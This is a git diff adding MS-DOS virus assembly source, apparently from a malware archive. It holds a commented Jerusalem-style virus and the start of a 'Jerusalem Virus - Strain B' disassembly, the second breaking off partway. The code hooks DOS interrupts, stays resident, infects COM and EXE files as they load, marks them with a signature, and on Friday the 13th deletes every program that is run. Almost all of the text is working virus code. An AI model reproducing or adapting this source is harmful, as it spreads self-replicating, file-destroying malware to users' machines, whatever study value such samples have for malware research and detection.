relocation factor + ADD AX,10H ; / + ADD PRGSEG,AX ; Initial code segment store + ADD PRG_SS,AX ; Initial stack segment store + MOV AH,0E0H ; Virus "are you there" call + INT 21H ; DOS service (Virus - 1) + CMP AH,0E0H ; Test for unchanged + JNB BP0040 ; Branch if not + CMP AH,3 ; Test for standard "yes" + POP ES + MOV SS,PRG_SS ; Initial stack segment store + MOV SP,PRG_SP ; Initial stack pointer store + JMP PROGRM ; Start of actual program + + ; Virus is not already active + +BP0040: + XOR AX,AX ; \ Address page zero + MOV ES,AX ; / + MOV AX,BW03FC ; \ Save system area data (1) + MOV SS_ST1,AX ; / + MOV AL,BB03FE ; \ Save system area data (2) + MOV SS_ST2,AL ; / + MOV BW03FC,0A5F3H ; Store REPZ MOVSW + MOV BB03FE,0CBH ; Store RETF + POP AX ; \ + ADD AX,10H ; ) Address past PSP + MOV ES,AX ; / + PUSH CS ; \ Set DS to CS + POP DS ; / + MOV CX,OFFSET ENDADR ; Length of virus + SHR CX,1 ; Divide by two (word parameter) + XOR SI,SI + MOV DI,SI + PUSH ES + MOV AX,OFFSET BP0050 + PUSH AX + DB 0EAH ; \ Far jump to move instruction + DW BW03FC, 0 ; / + +BP0050: + MOV AX,CS + MOV SS,AX + MOV SP,0700H + XOR AX,AX ; \ Address page zero + MOV DS,AX ; / + ASSUME DS:RAM,ES:NOTHING + MOV AX,SS_ST1 ; \ Restore system area data (1) + MOV BW03FC,AX ; / + MOV AL,SS_ST2 ; \ Restore system area data (2) + MOV BB03FE,AL ; / + MOV BX,SP + MOV CL,4 + SHR BX,CL + ADD BX,10H + MOV SET_PA,BX ; Save number of paragraphs + MOV AH,4AH ; Set block + MOV ES,ST_ES1 ; Get original ES + INT 21H ; DOS service (Set block) + MOV AX,3521H ; Get interrupt 21H + INT 21H ; DOS service (Get int) + MOV I21OFF,BX ; Save interrupt 21H offset + MOV I21SEG,ES ; Save interrupt 21H segment + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + MOV DX,OFFSET BP0130 ; Interrupt 21H routine + MOV AX,2521H ; Set interrupt 21H + INT 21H ; DOS service (Set int) + MOV ES,ST_ES1 ; Get original ES + ASSUME ES:RAM + MOV ES,ES:ENV_SG ; Get environment segment + XOR DI,DI ; Start of environment + MOV CX,7FFFH ; Allow for 
32K environment + XOR AL,AL ; Search for zero +BP0060: + REPNZ SCASB ; Find zero + CMP ES:[DI],AL ; Is following character zero + LOOPNZ BP0060 ; Search again if not + MOV DX,DI ; Save pointer + ADD DX,3 ; Address pathname + MOV AX,4B00H ; Load and execute program + PUSH ES ; \ Set DS to ES + POP DS ; / + PUSH CS ; \ Set ES to CS + POP ES ; / + ASSUME DS:RAM,ES:NOTHING + MOV BX,OFFSET PPB_01 ; PPB (for load and execute) + PUSH DS + PUSH ES + PUSH AX + PUSH BX + PUSH CX + PUSH DX + MOV AH,2AH ; Get date + INT 21H ; DOS service (Get date) + MOV DEL_SW,0 ; Set delete program switch off + CMP CX,07C3H ; Year = 1987 + JZ BP0080 ; Branch if yes + CMP AL,5 ; Day of week = Friday + JNZ BP0070 ; Branch if not + CMP DL,0DH ; Day of month = 13 + JNZ BP0070 ; Branch if not + INC DEL_SW ; Set delete program switch on + JMP BP0080 + +BP0070: + MOV AX,3508H ; Get interrupt 8 + INT 21H ; DOS service (Get int) + MOV I08OFF,BX ; Save interrupt 8 offset + MOV I08SEG,ES ; Save interrupt 8 segment + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + MOV TCOUNT,7E90H ; Start clock count (30 mins) + MOV AX,2508H ; Set interrupt 8 + MOV DX,OFFSET BP0100 ; Interrupt 8 routine + INT 21H ; DOS service (Set int) +BP0080: + POP DX + POP CX + POP BX + POP AX + POP ES + POP DS + ASSUME DS:NOTHING + PUSHF ; Fake an interrupt + CALL INT_21 ; Interrupt 21H (Load and execute) + PUSH DS ; \ Set ES to DS + POP ES ; / + MOV AH,49H ; Free allocated memory + INT 21H ; DOS service (Free memory) + MOV AH,4DH ; Get return code of child process + INT 21H ; DOS service (Get return code) + MOV AH,31H ; Keep process + MOV DX,OFFSET ENDKEEP ; Length of program + MOV CL,4 ; \ Convert to paragraphs + SHR DX,CL ; / + ADD DX,10H ; And another 256 bytes + INT 21H ; DOS service (Keep process) + + ; Interrupt 24H + +BP0090: + XOR AL,AL ; Ignore the error + IRET + + ; Interrupt 8 + +BP0100: + CMP TCOUNT,2 ; Is timer ready + JNZ BP0110 ; Branch if not + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH BP + MOV AX,0602H 
; Scroll up two lines + MOV BH,87H ; Blinking white on black + MOV CX,0505H ; Start row 5 column 5 + MOV DX,1010H ; End row 16 column 16 + INT 10H ; VDU I/O + POP BP + POP DX + POP CX + POP BX + POP AX +BP0110: + DEC TCOUNT ; Subtract from timer count + JNZ BP0120 ; Branch if not zero + MOV TCOUNT,1 ; Set back to one + PUSH AX + PUSH CX + PUSH SI + MOV CX,4001H ; \ Waste some time + REPZ LODSB ; / + POP SI + POP CX + POP AX +BP0120: + JMP INT_08 ; Interrupt 8 + + ; Interrupt 21H + +BP0130: + PUSHF + CMP AH,0E0H ; Virus "are you there" call + JNZ BP0140 ; Branch if other call + MOV AX,0300H ; Standard "yes" + POPF + IRET + +BP0140: + CMP AH,0DDH ; Virus replace program call + JZ BP0160 ; Branch if yes + CMP AH,0DEH ; Virus spare call + JZ BP0170 ; Branch if yes + CMP AX,4B00H ; Is it load and execute + JNZ BP0150 ; Branch if not + JMP BP0210 ; Process load and execute + +BP0150: + POPF + JMP CS:INT_21 ; Interrupt 21H + + ; Replace program call + +BP0160: + POP AX + POP AX ; Retrieve return offset + MOV AX,100H ; Replace with start address + MOV V_RTOF,AX ; Store in return jump + POP AX ; Retrieve return segment + MOV V_RTSG,AX ; Store in return jump + REPZ MOVSB ; Restore program to beginning + POPF + MOV AX,BEGIN ; Start with zero register + JMP VIR_RT ; Start actual program + + ; Spare virus call + +BP0170: + ADD SP,6 ; Remove three words from stack + POPF + MOV AX,CS ; \ + MOV SS,AX ; ) Set up internal stack + MOV SP,OFFSET ENDADR ; / + PUSH ES + PUSH ES + XOR DI,DI + PUSH CS ; \ Set ES to CS + POP ES ; / + MOV CX,10H ; Length to move + MOV SI,BX + MOV DI,OFFSET SPAR01 + REPZ MOVSB ; Copy to SPAR01-SPAR08 inclusive + MOV AX,DS ; \ Set ES to DS + MOV ES,AX ; / + MUL PARAGR ; Size of a paragraph + ADD AX,SPAR06 ; \ Add + ADC DX,0 ; / + DIV PARAGR ; Size of a paragraph + MOV DS,AX + MOV SI,DX + MOV DI,DX + MOV BP,ES ; Save ES + MOV BX,SPAR08 + OR BX,BX + JZ BP0190 +BP0180: + MOV CX,8000H + REPZ MOVSW + ADD AX,1000H + ADD BP,1000H + MOV DS,AX + MOV ES,BP ; Restore ES 
+ DEC BX + JNZ BP0180 +BP0190: + MOV CX,SPAR07 + REPZ MOVSB + POP AX ; Recover ES + PUSH AX ; Put it back again + ADD AX,10H ; Address past PSP + ADD SPAR05,AX ; Relocate SS + ADD SPAR03,AX ; Relocate ? + MOV AX,SPAR01 + POP DS + POP ES + MOV SS,SPAR05 + MOV SP,SPAR04 + JMP SP_RET + + ; Friday 13th - Delete program + +BP0200: + XOR CX,CX ; No attributes + MOV AX,4301H ; Set file attributes + INT 21H ; DOS service (Set attributes) + MOV AH,41H ; Delete directory entry + INT 21H ; DOS service (Delete entry) + MOV AX,4B00H ; Load and execute program + POPF + JMP INT_21 ; Interrupt 21H + + ; Process load and execute program + +BP0210: + CMP DEL_SW,1 ; Test delete program switch + JZ BP0200 ; Branch to delete if on + MOV F_HAND,-1 ; No file handle + MOV MEM_SW,0 ; Set off memory allocated switch + MOV FPTHOF,DX ; Save pathname offset + MOV FPTHSG,DS ; Save pathname segment + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH DS + PUSH ES + CLD + MOV DI,DX ; Point to file pathname + XOR DL,DL ; Default drive + CMP BYTE PTR [DI+1],3AH ; Test second character for ':' + JNZ BP0220 ; Branch if not + MOV DL,[DI] ; Get drive letter + AND DL,1FH ; Convert to number +BP0220: + MOV AH,36H ; Get disk free space + INT 21H ; DOS service (Get disk free) + CMP AX,-1 ; Test for invalid drive + JNZ BP0240 ; Branch if not +BP0230: + JMP BP0500 ; Terminate + +BP0240: + MUL BX ; Calc number of free sectors + MUL CX ; Calc number of free bytes + OR DX,DX ; Test high word of result + JNZ BP0250 ; Branch if not zero + CMP AX,OFFSET ENDADR ; Length of virus + JB BP0230 ; Terminate if less +BP0250: + MOV DX,FPTHOF ; Get pathname offset + PUSH DS ; \ Set ES to DS + POP ES ; / + XOR AL,AL ; Test character - zero + MOV CX,41H ; Maximum pathname length + REPNZ SCASB ; Find end of pathname + MOV SI,FPTHOF ; Get pathname offset +BP0260: + MOV AL,[SI] ; Get pathname character + OR AL,AL ; Test for a character + JZ BP0280 ; Finish if none + CMP AL,61H ; Test for 'a' + JB BP0270 ; Branch 
if less
+ CMP AL,7AH ; Test for 'z'
+ JA BP0270 ; Branch if above
+ SUB BYTE PTR [SI],20H ; Convert to uppercase
+BP0270:
+ INC SI ; Address next character
+ JMP BP0260 ; Process next character
+
+BP0280:
+ MOV CX,0BH ; Load length 11
+ SUB SI,CX ; Address back by length
+ MOV DI,OFFSET COM_CM ; 'COMMAND.COM'
+ PUSH CS ; \ Set ES to CS
+ POP ES ; /
+ MOV CX,0BH ; Load length again
+ REPZ CMPSB ; Compare
+ JNZ BP0290 ; Continue if not command.com
+ JMP BP0500 ; Terminate
+
+BP0290:
+ MOV AX,4300H ; Get file attributes
+ INT 21H ; DOS service (Get attributes)
+ JB BP0300 ; Follow chain of error branches
+ MOV F_ATTS,CX ; Save file attributes
+BP0300:
+ JB BP0320 ; Follow chain of error branches
+ XOR AL,AL ; Scan character - zero
+ MOV EXE_SW,AL ; Set EXE switch off
+ PUSH DS ; \ Set ES to DS
+ POP ES ; /
+ MOV DI,DX ; Pointer to pathname
+ MOV CX,41H ; Maximum pathname length
+ REPNZ SCASB ; Find end of pathname
+ CMP BYTE PTR [DI-2],4DH ; Is last letter 'M'
+ JZ BP0310 ; Branch if yes
+ CMP BYTE PTR [DI-2],6DH ; Is last letter 'm'
+ JZ BP0310 ; Branch if yes
+ INC EXE_SW ; Set EXE switch on
+BP0310:
+ MOV AX,3D00H ; Open handle, read only
+ INT 21H ; DOS service (Open handle)
+BP0320:
+ JB BP0340 ; Follow chain of error branches
+ MOV F_HAND,AX ; Save file handle
+ MOV BX,AX ; File handle
+ MOV AX,4202H ; Move file pointer
+ MOV CX,-1 ; \ End of file minus 5
+ MOV DX,-5 ; /
+ INT 21H ; DOS service (Move pointer)
+ JB BP0320 ; Follow chain of error branches
+ ADD AX,5 ; Total file size
+ MOV F_SIZE,AX ; Save total file size
+ MOV CX,5 ; Length to read
+ MOV DX,OFFSET SIGBUF ; Infection test buffer
+ MOV AX,CS ; \
+ MOV DS,AX ; ) Make DS & ES same as CS
+ MOV ES,AX ; /
+ ASSUME DS:CODE
+ MOV AH,3FH ; Read handle
+ INT 21H ; DOS service (Read handle)
+ MOV DI,DX ; Address test buffer
+ MOV SI,OFFSET VR_SIG ; Signature
+ REPZ CMPSB ; Compare signatures
+ JNZ BP0330 ; Branch if not infected
+ MOV AH,3EH ; Close handle
+ INT 21H ; DOS service (Close handle)
+ JMP BP0500
; Terminate
+
+BP0330:
+ MOV AX,3524H ; Get interrupt 24H
+ INT 21H ; DOS service (Get int)
+ MOV I24OFF,BX ; Save interrupt 24H offset
+ MOV I24SEG,ES ; Save interrupt 24H segment
+ MOV DX,OFFSET BP0090 ; Interrupt 24H routine
+ MOV AX,2524H ; Set interrupt 24H
+ INT 21H ; DOS service (Set int)
+ LDS DX,F_PATH ; Address program pathname
+ XOR CX,CX ; No attributes
+ MOV AX,4301H ; Set file attributes
+ INT 21H ; DOS service (Set attributes)
+ ASSUME DS:NOTHING
+BP0340:
+ JB BP0350 ; Follow chain of error branches
+ MOV BX,F_HAND ; Get file handle
+ MOV AH,3EH ; Close handle
+ INT 21H ; DOS service (Close handle)
+ MOV F_HAND,-1 ; No file handle
+ MOV AX,3D02H ; Open handle read/write
+ INT 21H ; DOS service (Open handle)
+ JB BP0350 ; Follow chain of error branches
+ MOV F_HAND,AX ; Save file handle
+ MOV AX,CS ; \
+ MOV DS,AX ; ) Make DS & ES same as CS
+ MOV ES,AX ; /
+ ASSUME DS:CODE
+ MOV BX,F_HAND ; Get file handle
+ MOV AX,5700H ; Get file date and time
+ INT 21H ; DOS service (Get file date)
+ MOV F_DATE,DX ; Save file date
+ MOV F_TIME,CX ; Save file time
+ MOV AX,4200H ; Move file pointer
+ XOR CX,CX ; \ Beginning of file
+ MOV DX,CX ; /
+ INT 21H ; DOS service (Move pointer)
+BP0350:
+ JB BP0380 ; Follow chain of error branches
+ CMP EXE_SW,0 ; Test EXE switch
+ JZ BP0360 ; Branch if off
+ JMP BP0400
+
+ ; .COM file processing
+
+BP0360:
+ MOV BX,1000H ; 64K of memory wanted
+ MOV AH,48H ; Allocate memory
+ INT 21H ; DOS service (Allocate memory)
+ JNB BP0370 ; Branch if successful
+ MOV AH,3EH ; Close handle
+ MOV BX,F_HAND ; Get file handle
+ INT 21H ; DOS service (Close handle)
+ JMP BP0500 ; Terminate
+
+BP0370:
+ INC MEM_SW ; Set on memory allocated switch
+ MOV ES,AX ; Segment of allocated memory
+ XOR SI,SI ; Start of virus
+ MOV DI,SI ; Start of allocated memory
+ MOV CX,OFFSET ENDADR ; Length of virus
+ REPZ MOVSB ; Copy virus to allocated
+ MOV DX,DI ; Address after virus
+ MOV CX,F_SIZE ; Total file size
+ MOV BX,F_HAND ; Get file handle
+
PUSH ES ; \ Set DS to ES
+ POP DS ; /
+ MOV AH,3FH ; Read handle
+ INT 21H ; DOS service (Read handle)
+BP0380:
+ JB BP0390 ; Follow chain of error branches
+ ADD DI,CX ; Add previous file size
+ XOR CX,CX ; \ Beginning of file
+ MOV DX,CX ; /
+ MOV AX,4200H ; Move file pointer
+ INT 21H ; DOS service (Move pointer)
+ MOV SI,OFFSET VR_SIG ; Signature
+ MOV CX,5 ; Length to move
+ REPZ MOVS [DI],CS:VR_SIG ; Copy signature to end
+ MOV CX,DI ; Length to write
+ XOR DX,DX ; Start of allocated
+ MOV AH,40H ; Write handle
+ INT 21H ; DOS service (Write handle)
+BP0390:
+ JB BP0410 ; Follow chain of error branches
+ JMP BP0480 ; Free memory and reset values
+
+ ; .EXE file processing
+
+BP0400:
+ MOV CX,1CH ; Length of EXE header
+ MOV DX,OFFSET EXEHED ; .EXE header store
+ MOV AH,3FH ; Read handle
+ INT 21H ; DOS service (Read handle)
+BP0410:
+ JB BP0430 ; Follow chain of error branches
+ MOV EXHD09,1984H ; Negative checksum
+ MOV AX,EXHD07 ; \ Store initial stack segment
+ MOV PRG_SS,AX ; /
+ MOV AX,EXHD08 ; \ Store initial stack pointer
+ MOV PRG_SP,AX ; /
+ MOV AX,EXHD10 ; \ Store initial code offset
+ MOV PRGOFF,AX ; /
+ MOV AX,EXHD11 ; \ Store initial code segment
+ MOV PRGSEG,AX ; /
+ MOV AX,EXHD02 ; Get size of file in pages
+ CMP EXHD01,0 ; Number of bytes in last page
+ JZ BP0420 ; Branch if none
+ DEC AX ; One less page
+BP0420:
+ MUL BYTSEC ; Bytes per sector
+ ADD AX,EXHD01 ; \ Add bytes in last page
+ ADC DX,0 ; /
+ ADD AX,0FH ; \ Round up
+ ADC DX,0 ; /
+ AND AX,0FFF0H ; Clear bottom figure
+ MOV F_SIZ1,AX ; Save low-order file size
+ MOV F_SIZ2,DX ; Save high-order file size
+ ADD AX,OFFSET ENDADR ; \ Add virus length
+ ADC DX,0 ; /
+BP0430:
+ JB BP0450 ; Follow chain of error branches
+ DIV BYTSEC ; Bytes per sector
+ OR DX,DX ; Test odd bytes
+ JZ BP0440 ; Branch if none
+ INC AX ; One more page for odd bytes
+BP0440:
+ MOV EXHD02,AX ; Store size of file in pages
+ MOV EXHD01,DX ; Store bytes in last page
+ MOV AX,F_SIZ1 ; Low-order file size
+ MOV
DX,F_SIZ2 ; High-order file size
+ DIV PARAGR ; Size of a paragraph
+ SUB AX,EXHD04 ; Size of header in paragraphs
+ MOV EXHD11,AX ; Initial code segment
+ MOV EXHD10,OFFSET BP0030 ; Initial code offset
+ MOV EXHD07,AX ; Initial stack segment
+ MOV EXHD08,OFFSET ENDADR ; Initial stack pointer
+ XOR CX,CX ; \ Beginning of file
+ MOV DX,CX ; /
+ MOV AX,4200H ; Move file pointer
+ INT 21H ; DOS service (Move pointer)
+BP0450:
+ JB BP0460 ; Follow chain of error branches
+ MOV CX,1CH ; Length of EXE header
+ MOV DX,OFFSET EXEHED ; .EXE header store
+ MOV AH,40H ; Write handle
+ INT 21H ; DOS service (Write handle)
+BP0460:
+ JB BP0470 ; Follow chain of error branches
+ CMP AX,CX ; Has same length been written
+ JNZ BP0480 ; Branch if not
+ MOV DX,F_SIZ1 ; Low-order file size
+ MOV CX,F_SIZ2 ; High-order file size
+ MOV AX,4200H ; Move file pointer
+ INT 21H ; DOS service (Move pointer)
+BP0470:
+ JB BP0480 ; Follow chain of error branches
+ XOR DX,DX ; Address beginning of virus
+ MOV CX,OFFSET ENDADR ; Length of virus
+ MOV AH,40H ; Write handle
+ INT 21H ; DOS service (Write handle)
+ ASSUME DS:NOTHING
+BP0480:
+ CMP MEM_SW,0 ; Test memory allocated switch
+ JZ BP0490 ; Branch if off
+ MOV AH,49H ; Free allocated memory
+ INT 21H ; DOS service (Free memory)
+BP0490:
+ CMP F_HAND,-1 ; Test file handle
+ JZ BP0500 ; Terminate if none
+ MOV BX,F_HAND ; Get file handle
+ MOV DX,F_DATE ; Get file date
+ MOV CX,F_TIME ; Get file time
+ MOV AX,5701H ; Set file date and time
+ INT 21H ; DOS service (Set file date)
+ MOV AH,3EH ; Close handle
+ INT 21H ; DOS service (Close handle)
+ LDS DX,F_PATH ; Address program pathname
+ MOV CX,F_ATTS ; Load file attributes
+ MOV AX,4301H ; Set file attributes
+ INT 21H ; DOS service (Set attributes)
+ LDS DX,INT_24 ; Original interrupt 24H address
+ MOV AX,2524H ; Set interrupt 24H
+ INT 21H ; DOS service (Set int)
+BP0500:
+ POP ES
+ POP DS
+ POP DI
+ POP SI
+ POP DX
+ POP CX
+ POP BX
+ POP AX
+ POPF
+ JMP INT_21 ; Interrupt 21H
+
+ DB
11 DUP (0)
+
+ENDKEEP EQU $
+
+ ; Stack area - rubbish
+
+ DB 04DH, 09BH, 018H, 004H, 000H, 000H, 000H, 000H
+ DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H
+ DB 000H, 001H, 000H, 000H, 000H, 000H, 000H, 032H
+ DB 000H, 000H, 000H, 02FH, 000H, 0FFH, 0FFH, 0FFH
+ DB 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH
+ DB 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 043H
+ DB 03AH, 05CH, 041H, 055H, 054H, 04FH, 045H, 058H
+ DB 045H, 043H, 02EH, 042H, 041H, 054H, 000H, 061H
+ DB 075H, 074H, 06FH, 065H, 078H, 065H, 063H, 00DH
+ DB 000H, 0FFH, 0FFH, 0FFH, 000H, 000H, 000H, 000H
+ DB 04DH, 09BH, 018H, 000H, 010H, 09AH, 0F0H, 0FEH
+ DB 01DH, 0F0H, 02FH, 001H, 09BH, 018H, 03CH, 001H
+ DB 0E9H, 092H, 000H, 073H, 055H, 04DH, 073H, 044H
+ DB 06FH, 073H, 000H, 001H, 026H, 01CH, 000H, 000H
+ DB 000H, 074H, 02AH, 0ABH, 000H, 0CDH, 017H, 060H
+ DB 014H, 09FH, 002H, 056H, 005H, 09BH, 018H, 053H
+ DB 03AH, 000H, 000H, 000H, 000H, 000H, 000H, 000H
+ DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H
+ DB 000H, 0B5H, 01BH, 080H, 000H, 000H, 000H, 080H
+ DB 000H, 0B5H, 01BH, 05CH, 000H, 0B5H, 01BH, 06CH
+ DB 000H, 0B5H, 01BH, 010H, 007H, 0EDH, 014H, 0C5H
+ DB 000H, 0EDH, 014H, 046H, 002H, 0A1H, 000H, 04DH
+ DB 05AH, 0F0H, 000H, 0B2H, 000H, 038H, 001H, 060H
+ DB 000H, 0D3H, 006H, 0FFH, 0FFH, 05EH, 015H, 010H
+ DB 007H, 084H, 019H, 0C5H, 000H, 05EH, 015H, 01EH
+ DB 000H, 000H, 000H, 037H, 020H, 02AH, 02AH, 02AH
+ DB 005H, 000H, 020H, 000H, 030H, 00FH, 000H, 060H
+ DB 000H, 002H, 010H, 000H, 0E0H, 05BH, 001H, 000H
+ DB 0B9H, 041H, 02AH, 09BH, 043H, 04FH, 04DH, 04DH
+ DB 041H, 04EH, 044H, 02EH, 043H, 04FH, 04DH, 001H
+ DB 000H, 000H, 000H, 000H, 000H, 0FCH, 0B4H, 0E0H
+ DB 0CDH, 021H, 080H, 0FCH, 0E0H, 073H, 016H, 080H
+ DB 0FCH, 003H, 072H, 011H, 0B4H, 0DDH, 0BFH, 000H
+ DB 001H, 0BEH, 010H, 007H, 003H, 0F7H, 02EH, 08BH
+
+ENDADR EQU $
+
+CODE ENDS
+
+ END START
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.jerusal.asm b/MSDOS/Virus.MSDOS.Unknown.jerusal.asm
new file mode 100644
index 00000000..e0ada054
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.jerusal.asm
@@ -0,0 +1,720 @@
+PAGE 59,132
+
+;*****************************************************************************
+; Jerusalem Virus - Strain B
+;
+; Disassembled and commented by:
+;
+; - Captain Morgan -
+;*****************************************************************************
+
+
+.286c
+
+data_1e equ 2Ch
+data_2e equ 43h
+data_3e equ 45h
+data_4e equ 47h
+data_5e equ 49h
+data_6e equ 51h
+data_7e equ 53h
+data_8e equ 57h
+data_9e equ 5Dh
+data_10e equ 5Fh
+data_11e equ 61h
+data_12e equ 63h
+data_13e equ 65h
+data_14e equ 78h
+data_15e equ 7Ah
+data_16e equ 7Ch
+data_17e equ 7Eh
+data_18e equ 0Ah
+data_19e equ 0Ch
+data_20e equ 0Eh
+data_21e equ 0Fh
+data_22e equ 11h
+data_23e equ 13h
+data_24e equ 15h
+data_25e equ 17h
+data_26e equ 19h
+data_27e equ 1Bh
+data_28e equ 1Dh
+data_29e equ 1Fh
+data_30e equ 29h
+data_31e equ 2Bh
+data_32e equ 2Dh
+data_33e equ 2Fh
+data_34e equ 31h
+data_35e equ 33h
+data_36e equ 4Eh
+data_37e equ 70h
+data_38e equ 72h
+data_39e equ 74h
+data_40e equ 76h
+data_41e equ 7Ah
+data_42e equ 80h
+data_43e equ 82h
+data_44e equ 8Fh
+
+seg_a segment
+ assume cs:seg_a, ds:seg_a
+
+
+ org 100h
+
+je proc far
+
+start:
+ jmp loc_2 ; (0195)
+ db 73h, 55h, 4Dh, 73h, 44h, 6Fh
+ db 73h, 0, 1, 0EBh, 21h, 0
+ db 0, 0, 0ABh, 0Bh, 2Ch, 2
+ db 70h, 0, 92h, 0Eh, 29h, 1Ah
+ db 0EBh, 4, 59h, 6Fh, 0A8h
+ db 7Bh
+ db 13 dup (0)
+ db 0E8h, 6, 0D7h, 62h, 21h, 80h
+ db 0, 0, 0, 80h, 0, 62h
+ db 21h, 5Ch, 0, 62h, 21h, 6Ch
+ db 0, 62h, 21h, 10h, 7, 60h
+ db 5Bh, 0C5h, 0, 60h, 5Bh, 0
+ db 0F0h, 6, 0, 4Dh, 5Ah, 30h
+ db 0, 53h, 0, 1Fh, 0, 20h
+ db 0, 0, 0, 0FFh, 0FFh, 0B2h
+ db 9, 10h, 7, 84h, 19h, 0C5h
+ db 0, 0B2h, 9, 20h, 0, 0
+ db 0, 2Eh, 0Dh, 0Ah, 0, 0
+ db 5, 0, 20h, 0, 26h, 12h
+ db 46h, 0A3h, 0, 2, 10h, 0
+ db 20h, 9Dh, 0, 0, 7Bh, 3Dh
+ db 2Eh, 9Bh
+ db 'COMMAND.COM'
+ db 1, 0, 0, 0, 0, 0
+loc_2:
+ cld ; Clear direction
+ mov ah,0E0h
+ int 21h ; DOS Services ah=function E0h
+ cmp ah,0E0h
+ jae loc_3 ; Jump if above or =
+ cmp ah,3
+ jb loc_3 ; Jump
if below
+ mov ah,0DDh
+ mov di,100h
+ mov si,710h
+ add si,di
+ mov cx,cs:[di+11h]
+ nop ;*Fixup for MASM (M)
+ int 21h ; DOS Services ah=function DDh
+loc_3:
+ mov ax,cs
+ add ax,10h
+ mov ss,ax
+ mov sp,700h
+loc_4:
+ push ax
+ mov ax,0C5h
+ push ax
+ retf ; Return far
+ db 0FCh, 6, 2Eh, 8Ch, 6, 31h
+ db 0, 2Eh, 8Ch, 6, 39h, 0
+ db 2Eh, 8Ch, 6, 3Dh, 0, 2Eh
+ db 8Ch, 6, 41h, 0, 8Ch, 0C0h
+ db 5, 10h, 0, 2Eh, 1, 6
+ db 49h, 0, 2Eh, 1, 6, 45h
+ db 0, 0B4h, 0E0h, 0CDh, 21h, 80h
+ db 0FCh, 0E0h, 73h, 13h, 80h, 0FCh
+ db 3, 7, 2Eh, 8Eh, 16h, 45h
+ db 0, 2Eh, 8Bh, 26h, 43h, 0
+ db 2Eh, 0FFh, 2Eh, 47h, 0, 33h
+ db 0C0h, 8Eh, 0C0h, 26h, 0A1h, 0FCh
+ db 3, 2Eh, 0A3h, 4Bh, 0, 26h
+ db 0A0h, 0FEh, 3, 2Eh, 0A2h, 4Dh
+ db 0
+ db 26h
+
+je endp
+
+;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
+;
+; External Entry Point
+;
+;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
+
+int_24h_entry proc far
+ mov word ptr ds:[3FCh],0A5F3h
+ mov byte ptr es:data_47,0CBh
+ pop ax
+ add ax,10h
+ mov es,ax
+ push cs
+ pop ds
+ mov cx,710h
+ shr cx,1 ; Shift w/zeros fill
+ xor si,si ; Zero register
+ mov di,si
+ push es
+ mov ax,142h
+ push ax
+;* jmp far ptr loc_1 ;*(0000:03FC)
+ db 0EAh, 0FCh, 3, 0, 0
+ db 8Ch, 0C8h, 8Eh, 0D0h, 0BCh, 0
+ db 7, 33h, 0C0h, 8Eh, 0D8h, 2Eh
+ db 0A1h, 4Bh, 0, 0A3h, 0FCh, 3
+ db 2Eh, 0A0h, 4Dh, 0, 0A2h, 0FEh
+ db 3
+int_24h_entry endp
+
+
+;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
+;
+; External Entry Point
+;
+;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
+
+int_21h_entry proc far
+ mov bx,sp
+ mov cl,4
+ shr bx,cl ; Shift w/zeros fill
+ add bx,10h
+ mov cs:data_35e,bx
+ mov ah,4Ah ; 'J'
+ mov es,cs:data_34e
+ int 21h ; DOS Services ah=function 4Ah
+ ; change mem allocation, bx=siz
+ mov ax,3521h
+ int 21h ; DOS Services ah=function 35h
+ ; get intrpt vector al in es:bx
+ mov cs:data_25e,bx
+ mov cs:data_26e,es
+ push cs
+ pop ds
+ mov dx,25Bh
+ mov ax,2521h
+ int 21h ; DOS Services ah=function 25h
+ ; set intrpt vector al to ds:dx
+ mov es,ds:data_34e
+ mov es,es:data_1e
+ xor di,di ; Zero register
+ mov cx,7FFFh
+ xor al,al ; Zero register
+
+locloop_5:
+ repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
+ cmp es:[di],al
+ loopnz locloop_5 ; Loop if zf=0, cx>0
+
+ mov dx,di
+ add dx,3
+ mov ax,4B00h
+ push es
+ pop ds
+ push cs
+ pop es
+ mov bx,35h
+ push ds
+ push es
+ push ax
+ push bx
+ push cx
+ push dx
+ mov ah,2Ah ; '*'
+ int 21h ; DOS Services ah=function 2Ah
+ ; get date, cx=year, dx=mon/day
+ mov byte ptr cs:data_20e,0
+ cmp cx,7C3h
+ je loc_7 ; Jump if equal
+ cmp al,5 ; Check to see if it's Friday
+ jne loc_6 ; Jump if not equal
+ cmp dl,0Dh ; Check to see if it's the 13th
+ jne loc_6 ; Jump if not equal
+ inc byte ptr cs:data_20e
+ jmp short loc_7 ; (02F7)
+ db 90h
+loc_6:
+ mov ax,3508h
+ int 21h ; DOS Services ah=function 35h
+ ; get intrpt vector al in es:bx
+ mov cs:data_23e,bx
+ mov cs:data_24e,es
+ push cs
+ pop ds
+ mov word ptr ds:data_29e,7E90h
+ mov ax,2508h
+ mov dx,21Eh
+ int 21h ; DOS Services ah=function 25h
